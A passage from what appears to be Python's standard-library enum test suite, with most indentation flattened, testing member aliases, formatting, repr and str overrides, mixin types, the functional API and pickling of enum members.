# see issue40084
class SuperEnum(IntEnum):
def __new__(cls, value, description=""):
obj = int.__new__(cls, value)
obj._value_ = value
obj.description = description
return obj
class SubEnum(SuperEnum):
sample = 5
self.assertTrue({'description'} <= set(dir(SubEnum.sample)))
def test_enum_in_enum_out(self):
Season = self.Season
self.assertIs(Season(Season.WINTER), Season.WINTER)
def test_enum_value(self):
Season = self.Season
self.assertEqual(Season.SPRING.value, 1)
def test_intenum_value(self):
self.assertEqual(IntStooges.CURLY.value, 2)
def test_enum(self):
Season = self.Season
lst = list(Season)
self.assertEqual(len(lst), len(Season))
self.assertEqual(len(Season), 4, Season)
self.assertEqual(
[Season.SPRING, Season.SUMMER, Season.AUTUMN, Season.WINTER], lst)
for i, season in enumerate('SPRING SUMMER AUTUMN WINTER'.split(), 1):
e = Season(i)
self.assertEqual(e, getattr(Season, season))
self.assertEqual(e.value, i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, season)
self.assertIn(e, Season)
self.assertIs(type(e), Season)
self.assertIsInstance(e, Season)
self.assertEqual(str(e), 'Season.' + season)
self.assertEqual(
repr(e),
'<Season.{0}: {1}>'.format(season, i),
)
def test_value_name(self):
Season = self.Season
self.assertEqual(Season.SPRING.name, 'SPRING')
self.assertEqual(Season.SPRING.value, 1)
with self.assertRaises(AttributeError):
Season.SPRING.name = 'invierno'
with self.assertRaises(AttributeError):
Season.SPRING.value = 2
def test_changing_member(self):
Season = self.Season
with self.assertRaises(AttributeError):
Season.WINTER = 'really cold'
def test_attribute_deletion(self):
class Season(Enum):
SPRING = 1
SUMMER = 2
AUTUMN = 3
WINTER = 4
def spam(cls):
pass
self.assertTrue(hasattr(Season, 'spam'))
del Season.spam
self.assertFalse(hasattr(Season, 'spam'))
with self.assertRaises(AttributeError):
del Season.SPRING
with self.assertRaises(AttributeError):
del Season.DRY
with self.assertRaises(AttributeError):
del Season.SPRING.name
def test_bool_of_class(self):
class Empty(Enum):
pass
self.assertTrue(bool(Empty))
def test_bool_of_member(self):
class Count(Enum):
zero = 0
one = 1
two = 2
for member in Count:
self.assertTrue(bool(member))
def test_invalid_names(self):
with self.assertRaises(ValueError):
class Wrong(Enum):
mro = 9
with self.assertRaises(ValueError):
class Wrong(Enum):
                _create_ = 11
with self.assertRaises(ValueError):
class Wrong(Enum):
_get_mixins_ = 9
with self.assertRaises(ValueError):
class Wrong(Enum):
_find_new_ = 1
with self.assertRaises(ValueError):
class Wrong(Enum):
_any_name_ = 9
def test_bool(self):
# plain Enum members are always True
class Logic(Enum):
true = True
false = False
self.assertTrue(Logic.true)
self.assertTrue(Logic.false)
# unless overridden
class RealLogic(Enum):
true = True
false = False
def __bool__(self):
return bool(self._value_)
self.assertTrue(RealLogic.true)
self.assertFalse(RealLogic.false)
# mixed Enums depend on mixed-in type
class IntLogic(int, Enum):
true = 1
false = 0
self.assertTrue(IntLogic.true)
self.assertFalse(IntLogic.false)
def test_contains(self):
Season = self.Season
self.assertIn(Season.AUTUMN, Season)
with self.assertRaises(TypeError):
3 in Season
with self.assertRaises(TypeError):
'AUTUMN' in Season
val = Season(3)
self.assertIn(val, Season)
class OtherEnum(Enum):
one = 1; two = 2
self.assertNotIn(OtherEnum.two, Season)
def test_comparisons(self):
Season = self.Season
with self.assertRaises(TypeError):
Season.SPRING < Season.WINTER
with self.assertRaises(TypeError):
Season.SPRING > 4
self.assertNotEqual(Season.SPRING, 1)
class Part(Enum):
SPRING = 1
CLIP = 2
BARREL = 3
self.assertNotEqual(Season.SPRING, Part.SPRING)
with self.assertRaises(TypeError):
Season.SPRING < Part.CLIP
def test_enum_duplicates(self):
class Season(Enum):
SPRING = 1
SUMMER = 2
AUTUMN = FALL = 3
WINTER = 4
ANOTHER_SPRING = 1
lst = list(Season)
self.assertEqual(
lst,
[Season.SPRING, Season.SUMMER,
Season.AUTUMN, Season.WINTER,
])
self.assertIs(Season.FALL, Season.AUTUMN)
self.assertEqual(Season.FALL.value, 3)
self.assertEqual(Season.AUTUMN.value, 3)
self.assertIs(Season(3), Season.AUTUMN)
self.assertIs(Season(1), Season.SPRING)
self.assertEqual(Season.FALL.name, 'AUTUMN')
self.assertEqual(
[k for k,v in Season.__members__.items() if v.name != k],
['FALL', 'ANOTHER_SPRING'],
)
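    # Takeaway: duplicate values become aliases -- reachable through
    # __members__ and by-value lookup, while iteration and .name always
    # resolve to the canonical (first-defined) member.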
def test_duplicate_name(self):
with self.assertRaises(TypeError):
class Color(Enum):
red = 1
green = 2
blue = 3
red = 4
with self.assertRaises(TypeError):
class Color(Enum):
red = 1
green = 2
blue = 3
def red(self):
return 'red'
with self.assertRaises(TypeError):
class Color(Enum):
@property
def red(self):
return 'redder'
red = 1
green = 2
blue = 3
def test_reserved__sunder_(self):
with self.assertRaisesRegex(
ValueError,
"_sunder_ names, such as '_bad_', are reserved",
):
class Bad(Enum):
_bad_ = 1
def test_enum_with_value_name(self):
class Huh(Enum):
name = 1
value = 2
self.assertEqual(
list(Huh),
[Huh.name, Huh.value],
)
self.assertIs(type(Huh.name), Huh)
self.assertEqual(Huh.name.name, 'name')
self.assertEqual(Huh.name.value, 1)
def test_format_enum(self):
Season = self.Season
self.assertEqual('{}'.format(Season.SPRING),
'{}'.format(str(Season.SPRING)))
        self.assertEqual('{:}'.format(Season.SPRING),
                         '{:}'.format(str(Season.SPRING)))
self.assertEqual('{:20}'.format(Season.SPRING),
'{:20}'.format(str(Season.SPRING)))
self.assertEqual('{:^20}'.format(Season.SPRING),
'{:^20}'.format(str(Season.SPRING)))
self.assertEqual('{:>20}'.format(Season.SPRING),
'{:>20}'.format(str(Season.SPRING)))
self.assertEqual('{:<20}'.format(Season.SPRING),
'{:<20}'.format(str(Season.SPRING)))
def test_str_override_enum(self):
class EnumWithStrOverrides(Enum):
one = auto()
two = auto()
def __str__(self):
return 'Str!'
self.assertEqual(str(EnumWithStrOverrides.one), 'Str!')
self.assertEqual('{}'.format(EnumWithStrOverrides.one), 'Str!')
def test_format_override_enum(self):
class EnumWithFormatOverride(Enum):
one = 1.0
two = 2.0
def __format__(self, spec):
return 'Format!!'
self.assertEqual(str(EnumWithFormatOverride.one), 'EnumWithFormatOverride.one')
self.assertEqual('{}'.format(EnumWithFormatOverride.one), 'Format!!')
def test_str_and_format_override_enum(self):
class EnumWithStrFormatOverrides(Enum):
one = auto()
two = auto()
def __str__(self):
return 'Str!'
def __format__(self, spec):
return 'Format!'
self.assertEqual(str(EnumWithStrFormatOverrides.one), 'Str!')
self.assertEqual('{}'.format(EnumWithStrFormatOverrides.one), 'Format!')
def test_str_override_mixin(self):
class MixinEnumWithStrOverride(float, Enum):
one = 1.0
two = 2.0
def __str__(self):
return 'Overridden!'
self.assertEqual(str(MixinEnumWithStrOverride.one), 'Overridden!')
self.assertEqual('{}'.format(MixinEnumWithStrOverride.one), 'Overridden!')
def test_str_and_format_override_mixin(self):
class MixinWithStrFormatOverrides(float, Enum):
one = 1.0
two = 2.0
def __str__(self):
return 'Str!'
def __format__(self, spec):
return 'Format!'
self.assertEqual(str(MixinWithStrFormatOverrides.one), 'Str!')
self.assertEqual('{}'.format(MixinWithStrFormatOverrides.one), 'Format!')
def test_format_override_mixin(self):
class TestFloat(float, Enum):
one = 1.0
two = 2.0
def __format__(self, spec):
return 'TestFloat success!'
self.assertEqual(str(TestFloat.one), 'TestFloat.one')
self.assertEqual('{}'.format(TestFloat.one), 'TestFloat success!')
def assertFormatIsValue(self, spec, member):
self.assertEqual(spec.format(member), spec.format(member.value))
def test_format_enum_date(self):
Holiday = self.Holiday
self.assertFormatIsValue('{}', Holiday.IDES_OF_MARCH)
self.assertFormatIsValue('{:}', Holiday.IDES_OF_MARCH)
self.assertFormatIsValue('{:20}', Holiday.IDES_OF_MARCH)
self.assertFormatIsValue('{:^20}', Holiday.IDES_OF_MARCH)
self.assertFormatIsValue('{:>20}', Holiday.IDES_OF_MARCH)
self.assertFormatIsValue('{:<20}', Holiday.IDES_OF_MARCH)
self.assertFormatIsValue('{:%Y %m}', Holiday.IDES_OF_MARCH)
self.assertFormatIsValue('{:%Y %m %M:00}', Holiday.IDES_OF_MARCH)
def test_format_enum_float(self):
Konstants = self.Konstants
self.assertFormatIsValue('{}', Konstants.TAU)
self.assertFormatIsValue('{:}', Konstants.TAU)
self.assertFormatIsValue('{:20}', Konstants.TAU)
self.assertFormatIsValue('{:^20}', Konstants.TAU)
self.assertFormatIsValue('{:>20}', Konstants.TAU)
self.assertFormatIsValue('{:<20}', Konstants.TAU)
self.assertFormatIsValue('{:n}', Konstants.TAU)
self.assertFormatIsValue('{:5.2}', Konstants.TAU)
self.assertFormatIsValue('{:f}', Konstants.TAU)
def test_format_enum_int(self):
Grades = self.Grades
self.assertFormatIsValue('{}', Grades.C)
self.assertFormatIsValue('{:}', Grades.C)
self.assertFormatIsValue('{:20}', Grades.C)
self.assertFormatIsValue('{:^20}', Grades.C)
self.assertFormatIsValue('{:>20}', Grades.C)
self.assertFormatIsValue('{:<20}', Grades.C)
self.assertFormatIsValue('{:+}', Grades.C)
self.assertFormatIsValue('{:08X}', Grades.C)
self.assertFormatIsValue('{:b}', Grades.C)
def test_format_enum_str(self):
Directional = self.Directional
self.assertFormatIsValue('{}', Directional.WEST)
self.assertFormatIsValue('{:}', Directional.WEST)
self.assertFormatIsValue('{:20}', Directional.WEST)
self.assertFormatIsValue('{:^20}', Directional.WEST)
self.assertFormatIsValue('{:>20}', Directional.WEST)
self.assertFormatIsValue('{:<20}', Directional.WEST)
def test_object_str_override(self):
class Colors(Enum):
RED, GREEN, BLUE = 1, 2, 3
def __repr__(self):
return "test.%s" % (self._name_, )
__str__ = object.__str__
self.assertEqual(str(Colors.RED), 'test.RED')
def test_enum_str_override(self):
class MyStrEnum(Enum):
def __str__(self):
return 'MyStr'
class MyMethodEnum(Enum):
def hello(self):
return 'Hello! My name is %s' % self.name
class Test1Enum(MyMethodEnum, int, MyStrEnum):
One = 1
Two = 2
        self.assertIs(Test1Enum._member_type_, int)
self.assertEqual(str(Test1Enum.One), 'MyStr')
self.assertEqual(format(Test1Enum.One, ''), 'MyStr')
#
class Test2Enum(MyStrEnum, MyMethodEnum):
One = 1
Two = 2
self.assertEqual(str(Test2Enum.One), 'MyStr')
        self.assertEqual(format(Test2Enum.One, ''), 'MyStr')
def test_inherited_data_type(self):
class HexInt(int):
def __repr__(self):
return hex(self)
class MyEnum(HexInt, enum.Enum):
A = 1
B = 2
C = 3
self.assertEqual(repr(MyEnum.A), '<MyEnum.A: 0x1>')
def test_too_many_data_types(self):
with self.assertRaisesRegex(TypeError, 'too many data types'):
class Huh(str, int, Enum):
One = 1
class MyStr(str):
def hello(self):
return 'hello, %s' % self
class MyInt(int):
def repr(self):
return hex(self)
with self.assertRaisesRegex(TypeError, 'too many data types'):
class Huh(MyStr, MyInt, Enum):
One = 1
def test_hash(self):
Season = self.Season
dates = {}
dates[Season.WINTER] = '1225'
dates[Season.SPRING] = '0315'
dates[Season.SUMMER] = '0704'
dates[Season.AUTUMN] = '1031'
self.assertEqual(dates[Season.AUTUMN], '1031')
def test_intenum_from_scratch(self):
class phy(int, Enum):
pi = 3
tau = 2 * pi
self.assertTrue(phy.pi < phy.tau)
def test_intenum_inherited(self):
class IntEnum(int, Enum):
pass
class phy(IntEnum):
pi = 3
tau = 2 * pi
self.assertTrue(phy.pi < phy.tau)
def test_floatenum_from_scratch(self):
class phy(float, Enum):
pi = 3.1415926
tau = 2 * pi
self.assertTrue(phy.pi < phy.tau)
def test_floatenum_inherited(self):
class FloatEnum(float, Enum):
pass
class phy(FloatEnum):
pi = 3.1415926
tau = 2 * pi
self.assertTrue(phy.pi < phy.tau)
def test_strenum_from_scratch(self):
class phy(str, Enum):
pi = 'Pi'
tau = 'Tau'
self.assertTrue(phy.pi < phy.tau)
def test_strenum_inherited_methods(self):
class phy(StrEnum):
pi = 'Pi'
tau = 'Tau'
self.assertTrue(phy.pi < phy.tau)
self.assertEqual(phy.pi.upper(), 'PI')
self.assertEqual(phy.tau.count('a'), 1)
def test_intenum(self):
class WeekDay(IntEnum):
SUNDAY = 1
MONDAY = 2
TUESDAY = 3
WEDNESDAY = 4
THURSDAY = 5
FRIDAY = 6
SATURDAY = 7
self.assertEqual(['a', 'b', 'c'][WeekDay.MONDAY], 'c')
self.assertEqual([i for i in range(WeekDay.TUESDAY)], [0, 1, 2])
lst = list(WeekDay)
self.assertEqual(len(lst), len(WeekDay))
self.assertEqual(len(WeekDay), 7)
target = 'SUNDAY MONDAY TUESDAY WEDNESDAY THURSDAY FRIDAY SATURDAY'
target = target.split()
for i, weekday in enumerate(target, 1):
e = WeekDay(i)
self.assertEqual(e, i)
self.assertEqual(int(e), i)
self.assertEqual(e.name, weekday)
self.assertIn(e, WeekDay)
self.assertEqual(lst.index(e)+1, i)
self.assertTrue(0 < e < 8)
self.assertIs(type(e), WeekDay)
self.assertIsInstance(e, int)
self.assertIsInstance(e, Enum)
def test_intenum_duplicates(self):
class WeekDay(IntEnum):
SUNDAY = 1
MONDAY = 2
TUESDAY = TEUSDAY = 3
WEDNESDAY = 4
THURSDAY = 5
FRIDAY = 6
SATURDAY = 7
self.assertIs(WeekDay.TEUSDAY, WeekDay.TUESDAY)
self.assertEqual(WeekDay(3).name, 'TUESDAY')
self.assertEqual([k for k,v in WeekDay.__members__.items()
if v.name != k], ['TEUSDAY', ])
def test_intenum_from_bytes(self):
self.assertIs(IntStooges.from_bytes(b'\x00\x03', 'big'), IntStooges.MOE)
with self.assertRaises(ValueError):
IntStooges.from_bytes(b'\x00\x05', 'big')
def test_floatenum_fromhex(self):
h = float.hex(FloatStooges.MOE.value)
self.assertIs(FloatStooges.fromhex(h), FloatStooges.MOE)
h = float.hex(FloatStooges.MOE.value + 0.01)
with self.assertRaises(ValueError):
FloatStooges.fromhex(h)
def test_pickle_enum(self):
if isinstance(Stooges, Exception):
raise Stooges
test_pickle_dump_load(self.assertIs, Stooges.CURLY)
test_pickle_dump_load(self.assertIs, Stooges)
def test_pickle_int(self):
if isinstance(IntStooges, Exception):
raise IntStooges
test_pickle_dump_load(self.assertIs, IntStooges.CURLY)
test_pickle_dump_load(self.assertIs, IntStooges)
def test_pickle_float(self):
if isinstance(FloatStooges, Exception):
raise FloatStooges
test_pickle_dump_load(self.assertIs, FloatStooges.CURLY)
test_pickle_dump_load(self.assertIs, FloatStooges)
def test_pickle_enum_function(self):
if isinstance(Answer, Exception):
raise Answer
test_pickle_dump_load(self.assertIs, Answer.him)
test_pickle_dump_load(self.assertIs, Answer)
def test_pickle_enum_function_with_module(self):
if isinstance(Question, Exception):
raise Question
test_pickle_dump_load(self.assertIs, Question.who)
test_pickle_dump_load(self.assertIs, Question)
def test_enum_function_with_qualname(self):
if isinstance(Theory, Exception):
raise Theory
self.assertEqual(Theory.__qualname__, 'spanish_inquisition')
def test_class_nested_enum_and_pickle_protocol_four(self):
# would normally just have this directly in the class namespace
class NestedEnum(Enum):
twigs = 'common'
shiny = 'rare'
self.__class__.NestedEnum = NestedEnum
self.NestedEnum.__qualname__ = '%s.NestedEnum' % self.__class__.__name__
test_pickle_dump_load(self.assertIs, self.NestedEnum.twigs)
def test_pickle_by_name(self):
class ReplaceGlobalInt(IntEnum):
ONE = 1
TWO = 2
ReplaceGlobalInt.__reduce_ex__ = enum._reduce_ex_by_name
for proto in range(HIGHEST_PROTOCOL):
self.assertEqual(ReplaceGlobalInt.TWO.__reduce_ex__(proto), 'TWO')
def test_exploding_pickle(self):
BadPickle = Enum(
'BadPickle', 'dill sweet bread-n-butter', module=__name__)
globals()['BadPickle'] = BadPickle
# now break BadPickle to test exception raising
enum._make_class_unpicklable(BadPickle)
test_pickle_exception(self.assertRaises, TypeError, BadPickle.dill)
test_pickle_exception(self.assertRaises, PicklingError, BadPickle)
def test_string_enum(self):
class SkillLevel(str, Enum):
master = 'what is the sound of one hand clapping?'
journeyman = 'why did the chicken cross the road?'
apprentice = 'knock, knock!'
self.assertEqual(SkillLevel.apprentice, 'knock, knock!')
def test_getattr_getitem(self):
class Period(Enum):
morning = 1
noon = 2
evening = 3
night = 4
self.assertIs(Period(2), Period.noon)
self.assertIs(getattr(Period, 'night'), Period.night)
self.assertIs(Period['morning'], Period.morning)
def test_getattr_dunder(self):
Season = self.Season
self.assertTrue(getattr(Season, '__eq__'))
def test_iteration_order(self):
class Season(Enum):
SUMMER = 2
WINTER = 4
AUTUMN = 3
SPRING = 1
self.assertEqual(
list(Season),
[Season.SUMMER, Season.WINTER, Season.AUTUMN, Season.SPRING],
)
def test_reversed_iteration_order(self):
self.assertEqual(
list(reversed(self.Season)),
[self.Season.WINTER, self.Season.AUTUMN, self.Season.SUMMER,
self.Season.SPRING]
)
def test_programmatic_function_string(self):
SummerMonth = Enum('SummerMonth', 'june july august')
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 1):
e = SummerMonth(i)
self.assertEqual(int(e.value), i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_string_with_start(self):
SummerMonth = Enum('SummerMonth', 'june july august', start=10)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 10):
e = SummerMonth(i)
self.assertEqual(int(e.value), i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_string_list(self):
SummerMonth = Enum('SummerMonth', ['june', 'july', 'august'])
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 1):
e = SummerMonth(i)
self.assertEqual(int(e.value), i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_string_list_with_start(self):
SummerMonth = Enum('SummerMonth', ['june', 'july', 'august'], start=20)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 20):
e = SummerMonth(i)
self.assertEqual(int(e.value), i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_iterable(self):
SummerMonth = Enum(
'SummerMonth',
(('june', 1), ('july', 2), ('august', 3))
)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 1):
e = SummerMonth(i)
self.assertEqual(int(e.value), i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_from_dict(self):
SummerMonth = Enum(
'SummerMonth',
OrderedDict((('june', 1), ('july', 2), ('august', 3)))
)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 1):
e = SummerMonth(i)
self.assertEqual(int(e.value), i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_type(self):
SummerMonth = Enum('SummerMonth', 'june july august', type=int)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 1):
e = SummerMonth(i)
self.assertEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_type_with_start(self):
SummerMonth = Enum('SummerMonth', 'june july august', type=int, start=30)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 30):
e = SummerMonth(i)
self.assertEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_type_from_subclass(self):
SummerMonth = IntEnum('SummerMonth', 'june july august')
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 1):
e = SummerMonth(i)
self.assertEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_type_from_subclass_with_start(self):
SummerMonth = IntEnum('SummerMonth', 'june july august', start=40)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 40):
e = SummerMonth(i)
self.assertEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_subclassing(self):
if isinstance(Name, Exception):
raise Name
self.assertEqual(Name.BDFL, 'Guido van Rossum')
        self.assertEqual(Name.BDFL, Name('Guido van Rossum'))
self.assertIs(Name.BDFL, getattr(Name, 'BDFL'))
test_pickle_dump_load(self.assertIs, Name.BDFL)
def test_extending(self):
class Color(Enum):
red = 1
green = 2
blue = 3
with self.assertRaises(TypeError):
class MoreColor(Color):
cyan = 4
magenta = 5
yellow = 6
with self.assertRaisesRegex(TypeError, "EvenMoreColor: cannot extend enumeration 'Color'"):
class EvenMoreColor(Color, IntEnum):
chartruese = 7
def test_exclude_methods(self):
class whatever(Enum):
this = 'that'
these = 'those'
def really(self):
return 'no, not %s' % self.value
self.assertIsNot(type(whatever.really), whatever)
self.assertEqual(whatever.this.really(), 'no, not that')
def test_wrong_inheritance_order(self):
with self.assertRaises(TypeError):
class Wrong(Enum, str):
NotHere = 'error before this point'
def test_intenum_transitivity(self):
class number(IntEnum):
one = 1
two = 2
three = 3
class numero(IntEnum):
uno = 1
dos = 2
tres = 3
self.assertEqual(number.one, numero.uno)
self.assertEqual(number.two, numero.dos)
self.assertEqual(number.three, numero.tres)
def test_wrong_enum_in_call(self):
class Monochrome(Enum):
black = 0
white = 1
class Gender(Enum):
male = 0
female = 1
self.assertRaises(ValueError, Monochrome, Gender.male)
def test_wrong_enum_in_mixed_call(self):
class Monochrome(IntEnum):
black = 0
white = 1
class Gender(Enum):
male = 0
female = 1
self.assertRaises(ValueError, Monochrome, Gender.male)
def test_mixed_enum_in_call_1(self):
class Monochrome(IntEnum):
black = 0
white = 1
class Gender(IntEnum):
male = 0
female = 1
self.assertIs(Monochrome(Gender.female), Monochrome.white)
def test_mixed_enum_in_call_2(self):
class Monochrome(Enum):
black = 0
white = 1
class Gender(IntEnum):
male = 0
female = 1
self.assertIs(Monochrome(Gender.male), Monochrome.black)
def test_flufl_enum(self):
class Fluflnum(Enum):
def __int__(self):
return int(self.value)
class MailManOptions(Fluflnum):
option1 = 1
option2 = 2
option3 = 3
self.assertEqual(int(MailManOptions.option1), 1)
def test_introspection(self):
class Number(IntEnum):
one = 100
two = 200
self.assertIs(Number.one._member_type_, int)
self.assertIs(Number._member_type_, int)
class String(str, Enum):
yarn = 'soft'
rope = 'rough'
wire = 'hard'
self.assertIs(String.yarn._member_type_, str)
self.assertIs(String._member_type_, str)
class Plain(Enum):
vanilla = 'white'
one = 1
self.assertIs(Plain.vanilla._member_type_, object)
self.assertIs(Plain._member_type_, object)
def test_no_such_enum_member(self):
class Color(Enum):
red = 1
green = 2
blue = 3
with self.assertRaises(ValueError):
Color(4)
with self.assertRaises(KeyError):
Color['chartreuse']
def test_new_repr(self):
class Color(Enum):
red = 1
green = 2
blue = 3
def __repr__(self):
return "don't you just love shades of %s?" % self.name
self.assertEqual(
repr(Color.blue),
"don't you just love shades of blue?",
)
def test_inherited_repr(self):
class MyEnum(Enum):
def __repr__(self):
return "My name is %s." % self.name
class MyIntEnum(int, MyEnum):
this = 1
that = 2
theother = 3
self.assertEqual(repr(MyIntEnum.that), "My name is that.")
def test_multiple_mixin_mro(self):
class auto_enum(type(Enum)):
def __new__(metacls, cls, bases, classdict):
temp = type(classdict)()
temp._cls_name = cls
names = set(classdict._member_names)
i = 0
for k in classdict._member_names:
v = classdict[k]
if v is Ellipsis:
v = i
else:
i = v
i += 1
temp[k] = v
for k, v in classdict.items():
if k not in names:
temp[k] = v
return super(auto_enum, metacls).__new__(
metacls, cls, bases, temp)
class AutoNumberedEnum(Enum, metaclass=auto_enum):
pass
class AutoIntEnum(IntEnum, metaclass=auto_enum):
pass
class TestAutoNumber(AutoNumberedEnum):
a = ...
b = 3
c = ...
class TestAutoInt(AutoIntEnum):
a = ...
b = 3
c = ...
def test_subclasses_with_getnewargs(self):
class NamedInt(int):
__qualname__ = 'NamedInt' # needed for pickle protocol 4
def __new__(cls, *args):
_args = args
name, *args = args
if len(args) == 0:
raise TypeError("name and value must be specified")
self = int.__new__(cls, *args)
self._intname = name
self._args = _args
return self
def __getnewargs__(self):
return self._args
@property
def __name__(self):
return self._intname
def __repr__(self):
# repr() is updated to include the name and type info
return "{}({!r}, {})".format(
type(self).__name__,
self.__name__,
int.__repr__(self),
)
def __str__(self):
# str() is unchanged, even if it relies on the repr() fallback
base = int
base_str = base.__str__
if base_str.__objclass__ is object:
return base.__repr__(self)
return base_str(self)
# for simplicity, we only define one operator that
# propagates expressions
def __add__(self, other):
                temp = int(self) + int(other)
if isinstance(self, NamedInt) and isinstance(other, NamedInt):
return NamedInt(
'({0} + {1})'.format(self.__name__, other.__name__),
temp,
)
else:
return temp
class NEI(NamedInt, Enum):
__qualname__ = 'NEI' # needed for pickle protocol 4
x = ('the-x', 1)
y = ('the-y', 2)
self.assertIs(NEI.__new__, Enum.__new__)
self.assertEqual(repr(NEI.x + NEI.y), "NamedInt('(the-x + the-y)', 3)")
globals()['NamedInt'] = NamedInt
globals()['NEI'] = NEI
NI5 = NamedInt('test', 5)
self.assertEqual(NI5, 5)
test_pickle_dump_load(self.assertEqual, NI5, 5)
self.assertEqual(NEI.y.value, 2)
test_pickle_dump_load(self.assertIs, NEI.y)
test_pickle_dump_load(self.assertIs, NEI)
def test_subclasses_with_getnewargs_ex(self):
class NamedInt(int):
__qualname__ = 'NamedInt' # needed for pickle protocol 4
def __new__(cls, *args):
_args = args
name, *args = args
if len(args) == 0:
raise TypeError("name and value must be specified")
self = int.__new__(cls, *args)
self._intname = name
self._args = _args
return self
def __getnewargs_ex__(self):
return self._args, {}
@property
def __name__(self):
return self._intname
def __repr__(self):
# repr() is updated to include the name and type info
return "{}({!r}, {})".format(
type(self).__name__,
self.__name__,
int.__repr__(self),
)
def __str__(self):
# str() is unchanged, even if it relies on the repr() fallback
base = int
base_str = base.__str__
if base_str.__objclass__ is object:
return base.__repr__(self)
return base_str(self)
# for simplicity, we only define one operator that
# propagates expressions
def __add__(self, other):
                temp = int(self) + int(other)
if isinstance(self, NamedInt) and isinstance(other, NamedInt):
return NamedInt(
'({0} + {1})'.format(self.__name__, other.__name__),
temp,
)
else:
return temp
class NEI(NamedInt, Enum):
__qualname__ = 'NEI' # needed for pickle protocol 4
x = ('the-x', 1)
y = ('the-y', 2)
self.assertIs(NEI.__new__, Enum.__new__)
self.assertEqual(repr(NEI.x + NEI.y), "NamedInt('(the-x + the-y)', 3)")
globals()['NamedInt'] = NamedInt
globals()['NEI'] = NEI
NI5 = NamedInt('test', 5)
self.assertEqual(NI5, 5)
test_pickle_dump_load(self.assertEqual, NI5, 5)
self.assertEqual(NEI.y.value, 2)
test_pickle_dump_load(self.assertIs, NEI.y)
test_pickle_dump_load(self.assertIs, NEI)
def test_subclasses_with_reduce(self):
class NamedInt(int):
__qualname__ = 'NamedInt' # needed for pickle protocol 4
def __new__(cls, *args):
_args = args
name, *args = args
if len(args) == 0:
raise TypeError("name and value must be specified")
self = int.__new__(cls, *args)
self._intname = name
self._args = _args
return self
def __reduce__(self):
return self.__class__, self._args
@property
def __name__(self):
return self._intname
def __repr__(self):
# repr() is updated to include the name and type info
return "{}({!r}, {})".format(
type(self).__name__,
self.__name__,
int.__repr__(self),
)
def __str__(self):
# str() is unchanged, even if it relies on the repr() fallback
base = int
base_str = base.__str__
if base_str.__objclass__ is object:
return base.__repr__(self)
return base_str(self)
# for simplicity, we only define one operator that
# propagates expressions
def __add__(self, other):
                temp = int(self) + int(other)
if isinstance(self, NamedInt) and isinstance(other, NamedInt):
return NamedInt(
'({0} + {1})'.format(self.__name__, other.__name__),
temp,
)
else:
return temp
class NEI(NamedInt, Enum):
__qualname__ = 'NEI' # needed for pickle protocol 4
